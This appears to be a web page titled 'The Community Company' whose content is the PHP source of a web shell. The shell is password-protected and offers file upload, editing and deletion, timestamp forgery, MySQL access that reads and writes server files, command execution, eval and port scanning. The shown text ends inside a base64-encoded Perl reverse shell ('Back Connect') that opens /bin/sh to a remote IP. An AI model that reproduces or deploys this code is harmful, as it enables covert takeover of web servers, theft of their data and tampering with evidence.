The Community Company

error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);

foreach($_POST as $key => $value) {
if (IS_GPC) {
$value = s_array($value);
}
$$key = $value;
}
/*===================== ³ÌÐòÅäÖà =====================*/

//echo encode_pass('angel');exit;
//angel = bb3fec7d9e3311522c5f32c1622a2706
// Èç¹ûÐèÒªÃÜÂëÑéÖ¤,ÇëÐ޸ĵǽÃÜÂë,Áô¿ÕΪ²»ÐèÒªÑéÖ¤
$pass = 'bb3fec7d9e3311522c5f32c1622a2706'; //angel

//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓÐÌØÊâÒªÇó, »òµÇ¼²»Õý³£, ÇëÐÞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
// cookie ǰ׺
$cookiepre = '';
// cookie ×÷ÓÃÓò
$cookiedomain = '';
// cookie ×÷Ó÷¾¶
$cookiepath = '/';
// cookie ÓÐЧÆÚ
$cookielife = 86400;

//³ÌÐòËÑË÷¿ÉдÎļþµÄÀàÐÍ
!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
/*===================== ÅäÖýáÊø =====================*/

$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
} elseif ($charset == 'euc-kr') {
header("content-Type: text/html; charset=euc-kr");
} elseif ($charset == 'euc-jp') {
header("content-Type: text/html; charset=euc-jp");
}

$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();

/*===================== Éí·ÝÑéÖ¤ =====================*/
if ($action == "logout") {
scookie('loginpass', '', -86400 * 365);
@header('Location: '.$self);
exit;
}
if($pass) {
if ($action == 'login') {
if ($pass == encode_pass($password)) {
scookie('loginpass',encode_pass($password));
@header('Location: '.$self);
exit;
}
}
if ($_COOKIE['loginpass']) {
if ($_COOKIE['loginpass'] != $pass) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== ÑéÖ¤½áÊø =====================*/

$errmsg = '';
!$action && $action = 'file';

// ²é¿´PHPINFO
if ($action == 'phpinfo') {
if (IS_PHPINFO) {
phpinfo();
exit;
} else {
$errmsg = 'phpinfo() function has non-permissible';
}
}

// ÏÂÔØÎļþ
if ($doing == 'downfile' && $thefile) {
if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$fileinfo = pathinfo($thefile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}

// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â
if ($doing == 'backupmysql' && !$saveasfile) {
if (!$table) {
$errmsg ='Please choose the table';
} else {
$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
$filename = basename($dbname.'.sql');
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
foreach($table as $k => $v) {
if ($v) {
sqldumptable($v);
}
}
mysql_close();
exit;
}
}

// ͨ¹ýMYSQLÏÂÔØÎļþ
if($doing=='mysqldown'){
if (!$dbname) {
$errmsg = 'Please input dbname';
} else {
$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
if (!file_exists($mysqldlfile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$result = q("select load_file('$mysqldlfile');");
if(!$result){
q("DROP TABLE IF EXISTS tmp_angel;");
q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__angel_1111111111_eof__µÄÎļþʱ²»ÍêÕûµÄÇé¿ö
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
$result = q("select content from tmp_angel");
q("DROP TABLE tmp_angel");
}
$row = @mysql_fetch_array($result);
if (!$row) {
$errmsg = 'Load file failed '.mysql_error();
} else {
$fileinfo = pathinfo($mysqldlfile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header("Accept-Length: ".strlen($row[0]));
echo $row[0];
exit;
}
}
}
}

?>



<?php echo $action.' - '.$_SERVER['HTTP_HOST'];?>





formhead(array('name'=>'opform'));
makehide('action', $action);
makehide('nowpath', $nowpath);
makehide('p1', $p1);
makehide('p2', $p2);
makehide('p3', $p3);
makehide('p4', $p4);
makehide('p5', $p5);
formfoot();

if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(@posix_geteuid());
$gid = @posix_getgrgid(@posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}

?>







/ User: ()

PHP / Safe Mode:
Logout |
File Manager |
MYSQL Manager |
MySQL Upload & Download |
Execute Command |
PHP Variable |
Port Scan |
Security information |
Eval PHP Code
| Back Connect

');

p('');

//²é¿´ËùÓпÉдÎļþºÍĿ¼
$dirdata=array();
$filedata=array();

if ($view_writable == 'dir') {
$dirdata = GetWDirList($nowpath);
$filedata = array();
} elseif ($view_writable == 'file') {
$dirdata = array();
$filedata = GetWFileList($nowpath);
} elseif ($findstr) {
$dirdata = array();
$filedata = GetSFileList($nowpath, $findstr, $re);
} else {
// Ŀ¼Áбí
//scandir()ЧÂʸü¸ß
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$filepath=$nowpath.$file;
if(@is_dir($filepath)){
$dirdb['filename']=$file;
$dirdb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
$dirdb['dirchmod']=getChmod($filepath);
$dirdb['dirperm']=getPerms($filepath);
$dirdb['fileowner']=getUser($filepath);
$dirdb['dirlink']=$nowpath;
$dirdb['server_link']=$filepath;
$dirdata[]=$dirdb;
} else {
$filedb['filename']=$file;
$filedb['size']=sizecount(@filesize($filepath));
$filedb['mtime']=@date('Y-m-d H:i:s',filemtime($filepath));
$filedb['filechmod']=getChmod($filepath);
$filedb['fileperm']=getPerms($filepath);
$filedb['fileowner']=getUser($filepath);
$filedb['dirlink']=$nowpath;
$filedb['server_link']=$filepath;
$filedata[]=$filedb;
}
}// while
unset($dirdb);
unset($filedb);
@closedir($dirs);
}
@sort($dirdata);
@sort($filedata);
$dir_i = '0';

p('');
makehide('action','file');
makehide('thefile');
makehide('doing');
makehide('dir',$nowpath);

foreach($dirdata as $key => $dirdb){
if($dirdb['filename']!='..' && $dirdb['filename']!='.') {
if($getdir && $getdir == $dirdb['server_link']) {
$attachsize = dirsize($dirdb['server_link']);
$attachsize = is_numeric($attachsize) ? sizecount($attachsize) : 'Unknown';
} else {
$attachsize = 'Stat';
}
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
$dir_i++;
} else {
if($dirdb['filename']=='..') {
p('');
p('');
p('');
}
}
}

p('');
$file_i = '0';

foreach($filedata as $key => $filedb){
if($filedb['filename']!='..' && $filedb['filename']!='.') {
$fileurl = str_replace($_SERVER["DOCUMENT_ROOT"],'',$filedb['server_link']);
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
$file_i++;
}
}
p('');
p('');
p('

$errmsg && m($errmsg);

// »ñÈ¡µ±Ç°Â·¾¶
if (!$dir) {
$dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
}
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
$dir = $dir.'/';
}

if ($action == 'file') {

// Åж϶ÁдÇé¿ö
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';

// ´´½¨Ä¿Â¼
if ($newdirname) {
$mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
@chmod($mkdirs,0777);
}
}

// ÉÏ´«Îļþ
elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
}

// ±à¼­Îļþ
elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename,'w');
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
@fclose($fp);
}

// ±à¼­ÎļþÊôÐÔ
elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm,8,10);
m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
}
}

// ¸ÄÃû
elseif ($oldname && $newfilename) {
$nname = $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname.' has already existed or original file does not exist');
} else {
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
}
}

// ¸´ÖÆÎļþ
elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
}
}

// ¿Ë¡ʱ¼ä
elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}

// ×Ô¶¨Òåʱ¼ä
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}

// ÅúÁ¿É¾³ýÎļþ
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ = $fail = 0;
foreach ($dl as $filepath) {
if (is_dir($filepath)) {
if (@deltree($filepath)) {
$succ++;
} else {
$fail++;
}
} else {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
}
m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
} else {
m('Please select folder/file(s)');
}
}

//²Ù×÷Íê±Ï
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform', 'target'=>'_blank'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
formhead(array('name'=>'getsize'));
makehide('getdir');
makehide('dir');
formfoot();

$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all-$free;
p('

File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)

');

$cwd_links = '';
$path = explode('/', $nowpath);
$n=count($path);
for($i=0;$i<$n-1;$i++) {
$cwd_links .= ''.$path[$i].'/';
}

?>







()










if (IS_WIN && IS_COM) {
$obj = new COM('scripting.filesystemobject');
if ($obj && is_object($obj) && $obj->Drives) {
echo '
';
$DriveTypeDB = array(0 => 'Unknow',1 => 'Removable',2 => 'Fixed',3 => 'Network',4 => 'CDRom',5 => 'RAM Disk');
$comma = '';
foreach($obj->Drives as $drive) {
if ($drive->Path) {
p($comma.''.$DriveTypeDB[$drive->DriveType].'('.$drive->Path.')');
$comma = '|';
}
}
echo '
';
}
}
?>

$findstr = $_POST['findstr'];
$re = $_POST['re'];
tbhead();
p('
');
p('
');
p('WebRoot');
p(' | ScriptPath');
p(' | View All');
p(' | View Writable ( Directory');
p(' | File )');
p(' | Create Directory | Create File');

p('
Find string in files(current folder): Type: Regular expressions
 FilenameLast modifiedSizeChmod / PermsAction
'.$dirdb['filename'].''.$dirdb['mtime'].''.$attachsize.'');
p(''.$dirdb['dirchmod'].' / ');
p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].'
Rename
-Parent Directory
'.((strpos($filedb['server_link'], $_SERVER["DOCUMENT_ROOT"]) !== false) ? ''.$filedb['filename'].'' : $filedb['filename']).''.$filedb['mtime'].''.$filedb['size'].'');
p(''.$filedb['filechmod'].' / ');
p(''.$filedb['fileperm'].''.$filedb['fileowner'].'
');
p('Down | ');
p('Copy | ');
p('Edit | ');
p('Rename');
p('
 FilenameLast modifiedSizeChmod / PermsAction
Delete selected'.$dir_i.' directories / '.$file_i.' files
');
}// end dir

elseif ($action == 'sqlfile') {
if($doing=="mysqlupload"){
$file = $_FILES['uploadfile'];
$filename = $file['tmp_name'];
if (file_exists($savepath)) {
m('The goal file has already existed');
} else {
if(!$filename) {
m('Please choose a file');
} else {
$fp=@fopen($filename,'r');
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents = bin2hex($contents);
if(!$upname) $upname = $file['name'];
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
m($result ? 'Upload success' : 'Upload has failed: '.mysql_error());
}
}
}
?>

!$dbhost && $dbhost = 'localhost';
!$dbuser && $dbuser = 'root';
!$dbport && $dbport = '3306';
formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
makehide('action','sqlfile');
p('

');
p('DBHost:');
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
p(':');
makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
p('DBUser:');
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
p('DBPass:');
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
p('DBName:');
makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
p('DBCharset:');
makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
p('

');
formfoot();
p('
');
p('

Upload file

');
p('

This operation the DB user must has FILE privilege

');
p('

Save path(fullpath): Choose a file: Upload

');
p('

Download file

');
p('

File: Download

');
makehide('dbhost');
makehide('dbport');
makehide('dbuser');
makehide('dbpass');
makehide('dbname');
makehide('charset');
makehide('doing');
makehide('action','sqlfile');
p('
');
}

elseif ($action == 'mysqladmin') {
!$dbhost && $dbhost = 'localhost';
!$dbuser && $dbuser = 'root';
!$dbport && $dbport = '3306';
$dbform = '';
if(isset($dbhost)){
$dbform .= "\n";
}
if(isset($dbuser)) {
$dbform .= "\n";
}
if(isset($dbpass)) {
$dbform .= "\n";
}
if(isset($dbport)) {
$dbform .= "\n";
}
if(isset($dbname)) {
$dbform .= "\n";
}
if(isset($charset)) {
$dbform .= "\n";
}

if ($doing == 'backupmysql' && $saveasfile) {
if (!$table) {
m('Please choose the table');
} else {
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$fp = @fopen($path,'w');
if ($fp) {
foreach($table as $k => $v) {
if ($v) {
sqldumptable($v, $fp);
}
}
fclose($fp);
$fileurl = str_replace(SA_ROOT,'',$path);
m('Database has success backup to '.$path.'');
mysql_close();
} else {
m('Backup failed');
}
}
}
if ($insert && $insertsql) {
$keystr = $valstr = $tmp = '';
foreach($insertsql as $key => $val) {
if ($val) {
$keystr .= $tmp.$key;
$valstr .= $tmp."'".addslashes($val)."'";
$tmp = ',';
}
}
if ($keystr && $valstr) {
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
}
}
if ($update && $insertsql && $base64) {
$valstr = $tmp = '';
foreach($insertsql as $key => $val) {
$valstr .= $tmp.$key."='".addslashes($val)."'";
$tmp = ',';
}
if ($valstr) {
$where = base64_decode($base64);
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
}
}
if ($doing == 'del' && $base64) {
$where = base64_decode($base64);
$delete_sql = "DELETE FROM $tablename WHERE $where";
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
}

if ($tablename && $doing == 'drop') {
$mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
if (q("DROP TABLE $tablename")) {
m('Drop table of success');
$tablename = '';
} else {
m(mysql_error());
}
}

formhead(array('title'=>'MYSQL Manager'));
makehide('action','mysqladmin');
p('

');
p('DBHost:');
makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
p(':');
makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
p('DBUser:');
makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
p('DBPass:');
makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
p('DBCharset:');
makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
p('

');
formfoot();

//²Ù×÷¼Ç¼
formhead(array('name'=>'recordlist'));
makehide('doing');
makehide('action','mysqladmin');
makehide('base64');
makehide('tablename');
p($dbform);
formfoot();

//Ñ¡¶¨Êý¾Ý¿â
formhead(array('name'=>'setdbname'));
makehide('action','mysqladmin');
p($dbform);
if (!$dbname) {
makehide('dbname');
}
formfoot();

//Ñ¡¶¨±í
formhead(array('name'=>'settable'));
makehide('action','mysqladmin');
p($dbform);
makehide('tablename');
makehide('page',$page);
makehide('doing');
formfoot();

$cachetables = array();
$pagenum = 30;
$page = intval($page);
if($page) {
$start_limit = ($page - 1) * $pagenum;
} else {
$start_limit = 0;
$page = 1;
}
if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
//»ñÈ¡Êý¾Ý¿âÐÅÏ¢
$mysqlver = mysql_get_server_info();
p('

MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'

');
$highver = $mysqlver > '4.1' ? 1 : 0;

//»ñÈ¡Êý¾Ý¿â
$query = q("SHOW DATABASES");
$dbs = array();
$dbs[] = '-- Select a database --';
while($db = mysql_fetch_array($query)) {
$dbs[$db['Database']] = $db['Database'];
}
makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
$tabledb = array();
if ($dbname) {
p('

');
p('Current dababase: '.$dbname.'');
if ($tablename) {
p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]');
}
p('

');
mysql_select_db($dbname);

$getnumsql = '';
$runquery = 0;
if ($sql_query) {
$runquery = 1;
}
$allowedit = 0;
if ($tablename && !$sql_query) {
$sql_query = "SELECT * FROM $tablename";
$getnumsql = $sql_query;
$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
$allowedit = 1;
}
p('
');
p('

Run SQL query/queries on database '.$dbname.':

');
makehide('tablename', $tablename);
makehide('action','mysqladmin');
p($dbform);
p('
');
if ($tablename || ($runquery && $sql_query)) {
if ($doing == 'structure') {
$result = q("SHOW FULL COLUMNS FROM $tablename");
$rowdb = array();
while($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
p('

Structure

');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
foreach ($rowdb as $row) {
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
}
tbfoot();
$result = q("SHOW INDEX FROM $tablename");
$rowdb = array();
while($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
p('

Indexes

');
p('
FieldTypeCollationNullKeyDefaultExtraPrivilegesComment
'.$row['Field'].''.$row['Type'].''.$row['Collation'].' '.$row['Null'].' '.$row['Key'].' '.$row['Default'].' '.$row['Extra'].' '.$row['Privileges'].' '.$row['Comment'].' 
');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
foreach ($rowdb as $row) {
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
}
tbfoot();
} elseif ($doing == 'insert' || $doing == 'edit') {
$result = q('SHOW COLUMNS FROM '.$tablename);
while ($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
$rs = array();
if ($doing == 'insert') {
p('

Insert new line in '.$tablename.' table »

');
} else {
p('

Update record in '.$tablename.' table »

');
$where = base64_decode($base64);
$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
$rs = mysql_fetch_array($result);
}
p('');
p($dbform);
makehide('action','mysqladmin');
makehide('tablename',$tablename);
p('
KeynameTypeUniquePackedSeq_in_indexFieldCardinalityCollationNullComment
'.$row['Key_name'].''.$row['Index_type'].''.($row['Non_unique'] ? 'No' : 'Yes').' '.($row['Packed'] === null ? 'No' : $row['Packed']).' '.$row['Seq_in_index'].''.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').' '.($row['Cardinality'] ? $row['Cardinality'] : 0).' '.$row['Collation'].' '.$row['Null'].' '.$row['Comment'].' 
');
foreach ($rowdb as $row) {
if ($rs[$row['Field']]) {
$value = htmlspecialchars($rs[$row['Field']]);
} else {
$value = '';
}
$thisbg = bg();
p('');
if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
p('');
} else {
p('');
}
}
if ($doing == 'insert') {
p('');
} else {
p('');
makehide('base64', $base64);
}
p('
'.$row['Field'].'
'.$row['Type'].'
'.$value.' 
'.$row['Field'].'
'.$row['Type'].'
');
} else {
$querys = @explode(';',$sql_query);
foreach($querys as $num=>$query) {
if ($query) {
p("

Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."

");
switch(qy($query))
{
case 0:
p('

Error : '.mysql_error().'

');
break;
case 1:
if (strtolower(substr($query,0,13)) == 'select * from') {
$allowedit = 1;
}
if ($getnumsql) {
$tatol = mysql_num_rows(q($getnumsql));
$multipage = multi($tatol, $pagenum, $page, $tablename);
}
if (!$tablename) {
$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
$tablename = $matches[1][0];
}

/*********************/
$getfield = q("SHOW COLUMNS FROM $tablename");
$rowdb = array();
$keyfied = ''; //Ö÷¼ü×Ö¶Î
while($row = @mysql_fetch_assoc($getfield)) {
$rowdb[$row['Field']]['Key'] = $row['Key'];
$rowdb[$row['Field']]['Extra'] = $row['Extra'];
if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
$keyfied = $row['Field'];
}
}
/*********************/
//Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ
if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
$query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
}

$result = q($query);

p($multipage);
p('');
p('');
if ($allowedit) p('');
$fieldnum = @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
p("");
}
p('');

while($mn = @mysql_fetch_assoc($result)){
$thisbg = bg();
p('');
$where = $tmp = $b1 = '';
//Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ
foreach($mn as $key=>$inside){
if ($inside) {
//²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£
if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
$where = $key."='".addslashes($inside)."'";
break;
}
$where .= $tmp.$key."='".addslashes($inside)."'";
$tmp = ' AND ';
}
}
//¶ÁÈ¡¼Ç¼ÓÃ
foreach($mn as $key=>$inside){
$b1 .= '';
}
$where = base64_encode($where);

if ($allowedit) p('');

p($b1);
p('');
unset($b1);
}
p('');
if ($allowedit) p('');
$fieldnum = @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
p("");
}
p('');
tbfoot();
p($multipage);
break;
case 2:
$ar = mysql_affected_rows();
p('

affected rows : '.$ar.'

');
break;
}
}
}
}
} else {
$query = q("SHOW TABLE STATUS");
$table_num = $table_rows = $data_size = 0;
$tabledb = array();
while($table = mysql_fetch_array($query)) {
$data_size = $data_size + $table['Data_length'];
$table_rows = $table_rows + $table['Rows'];
$table['Data_length'] = sizecount($table['Data_length']);
$table_num++;
$tabledb[] = $table;
}
$data_size = sizecount($data_size);
unset($table);
p('
Action$name
$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
'.html_clean($inside).'  Edit | Del
Action$name
$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? ' - PRIMARY' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? ' - Auto' : '')."
');
p('');
makehide('action','mysqladmin');
p($dbform);
p('');
p('');
p('');
p('');
p('');
p('');
p('');
if ($highver) {
p('');
p('');
}
p('');
p('');
foreach ($tabledb as $key => $table) {
$thisbg = bg();
p('');
p('');
p('');
p('');
p('');
p('');
p('');
if ($highver) {
p('');
p('');
}
p('');
p('');
}
p('');
p('');
p('');
p('');
p('');
p('');
p('');
if ($highver) {
p('');
p('');
}
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');
p('');

p("");
makehide('doing','backupmysql');
formfoot();
p("
 NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
'.$table['Name'].''.$table['Rows'].''.$table['Data_length'].''.$table['Create_time'].' '.$table['Update_time'].' '.$table['Engine'].''.$table['Collation'].'Insert | Structure | Drop
NameRowsData_lengthCreate_timeUpdate_timeEngineCollationOperate
 Total tables: '.$table_num.''.$table_rows.''.$data_size.' 
Save as file
");
fr($query);
}
}
}
tbfoot();
@mysql_close();
}//end mysql

elseif ($action == 'backconnect') {
!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
!$yourport && $yourport = '12345';
$usedb = array('perl'=>'perl','c'=>'c');

$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
